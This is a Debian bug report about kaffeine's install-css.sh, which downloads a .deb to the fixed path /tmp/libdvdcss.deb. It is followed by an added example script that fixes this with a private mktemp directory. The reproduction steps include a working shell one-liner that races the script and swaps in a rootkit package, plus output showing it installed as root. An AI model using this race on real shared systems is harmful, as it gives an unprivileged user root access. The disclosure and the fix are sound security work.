[Pkg-kde-extras] Bug#554772: install-css.sh: insecure temporary file /tmp/libdvdcss.deb

Timo Juhani Lindfors timo.lindfors at iki.fi
Fri Nov 6 12:09:54 UTC 2009


Package: kaffeine
Version: 0.8.7-1
Severity: normal
Tags: security

Steps to reproduce:
1) Malice starts the following command in the background with the
   privileges of her normal user account:

sh -c 'echo > /tmp/libdvdcss.deb; inotifywait /tmp/libdvdcss.deb; rm /tmp/libdvdcss.deb; mv /tmp/rootkit.deb /tmp/libdvdcss.deb' &

2) Malice calls the local administrator Trent and complains that she
   can't watch DVDs.

3) Guided by /usr/share/doc/kaffeine/README.Debian Trent runs

sudo bash /usr/share/doc/kaffeine/install-css.sh

Expected results:
3) Code to decrypt DVDs is installed.

Actual results:
3) Due to insecure use of temporary files in install-css.sh Malice's
   rootkit.deb is installed:

$ sudo bash /usr/share/doc/kaffeine/install-css.sh
--2009-11-06 13:54:46--  http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
Resolving www.dtek.chalmers.se... 129.16.30.198
Connecting to www.dtek.chalmers.se|129.16.30.198|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26176 (26K) [text/plain]
Saving to: `/tmp/libdvdcss.deb'

100%[=====================================>] 26,176      --.-K/s   in 0.03s

2009-11-06 13:54:47 (799 KB/s) - `/tmp/libdvdcss.deb' saved [26176/26176]

(Reading database ... 176859 files and directories currently installed.)
Unpacking replacement rootkit ...
Setting up rootkit (0.1-1) ...
Processing triggers for man-db ...


-- System Information:
Debian Release: 5.0.3
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-xen-amd64 (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=fi_FI (charmap=ISO-8859-1)
Shell: /bin/sh linked to /bin/bash

Versions of packages kaffeine depends on:
ii  hdparm           8.9-3                   tune hard disk parameters for high
ii  kdelibs4c2a      4:3.5.10.dfsg.1-0lenny2 core libraries and binaries for al
ii  libc6            2.7-18                  GNU C Library: Shared libraries
ii  libcdparanoia0   3.10.2+debian-5         audio extraction tool for sampling
ii  libgcc1          1:4.3.2-1.1             GCC support library
ii  libogg0          1.1.3-4                 Ogg Bitstream Library
ii  libqt3-mt        3:3.3.8b-5              Qt GUI Library (Threaded runtime v
ii  libstdc++6       4.3.2-1.1               The GNU Standard C++ Library v3
ii  libvorbis0a      1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libvorbisenc2    1.2.0.dfsg-3.1          The Vorbis General Audio Compressi
ii  libx11-6         2:1.1.5-2               X11 client-side library
ii  libxcb1          1.1-1.2                 X C Binding
ii  libxext6         2:1.0.4-1               X11 miscellaneous extension librar
ii  libxine1         1.1.14-6                the xine video/media player librar
ii  libxine1-ffmpeg  1.1.14-6                MPEG-related plugins for libxine1
ii  libxine1-x       1.1.14-6                X desktop video output plugins for
ii  libxinerama1     2:1.0.3-2               X11 Xinerama extension library
ii  libxtst6         2:1.0.3-1               X11 Testing -- Resource extension 

kaffeine recommends no packages.

kaffeine suggests no packages.

-- no debconf information
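The following is an added example and not the kaffeine package's install-css.sh (the script's source is not in the report; the wget output above only shows that it saves to the fixed path /tmp/libdvdcss.deb and then runs dpkg -i). It shows the usual fix for this class of bug: do the download inside a freshly created, randomly named, mode 0700 directory from mktemp -d, re-check the directory before using it, and clean it up on exit. The fetch and install steps are parameters (wget and dpkg by default, both assumed from the output above) so the flow can be exercised offline without root.

```bash
#!/bin/sh
# Added example, not the kaffeine package's install-css.sh (whose source is not
# in the bug report).  Assumed from the report's output: the original script
# fetches a .deb with wget to the fixed path /tmp/libdvdcss.deb and then runs
# dpkg -i on it.  This version removes the predictable path that lets an
# unprivileged user pre-create or swap the file while root is running it.
set -eu

# Create a private working directory with a random name and mode 0700.
# mktemp -d creates it atomically, so it cannot already exist or have been
# pre-created by someone else.
secure_workdir() {
    mktemp -d "${TMPDIR:-/tmp}/install-css.XXXXXXXXXX"
}

# Defensive re-check before using the directory: it must be a real directory
# (not a symlink), owned by us, and not accessible to anyone else.
# stat -c is GNU coreutils syntax, as on Debian.
check_workdir() {
    local d
    d=$1
    [ -d "$d" ] || return 1
    [ ! -L "$d" ] || return 1
    [ -O "$d" ] || return 1
    [ "$(stat -c '%a' "$d")" = "700" ] || return 1
    return 0
}

# Default fetcher and installer, matching what the report shows the original
# script doing.  Both are parameters of install_deb so the flow can be run
# without network access or root (for example with stand-in functions).
fetch_with_wget() { wget -O "$2" "$1"; }
install_with_dpkg() { dpkg -i "$1"; }

# Download URL into the private directory and install from there.  The file
# lives under a name no other user can guess, inside a directory only we can
# enter, and the directory is removed when the script exits.
install_deb() {
    local url fetch install d
    url=$1
    fetch=${2:-fetch_with_wget}
    install=${3:-install_with_dpkg}
    d=$(secure_workdir)
    check_workdir "$d"
    trap "rm -rf '$d'" EXIT
    "$fetch" "$url" "$d/package.deb"
    "$install" "$d/package.deb"
}

# Real usage (the URL is the one from the report's wget output):
# install_deb http://www.dtek.chalmers.se/groups/dvd/deb/libdvdcss2_1.2.5-1_amd64.deb
```

The second check in check_workdir is what closes the race described in the report: even if the script were later changed to a fixed name, a directory that is a symlink, owned by someone else, or writable by others is refused before anything is written into it.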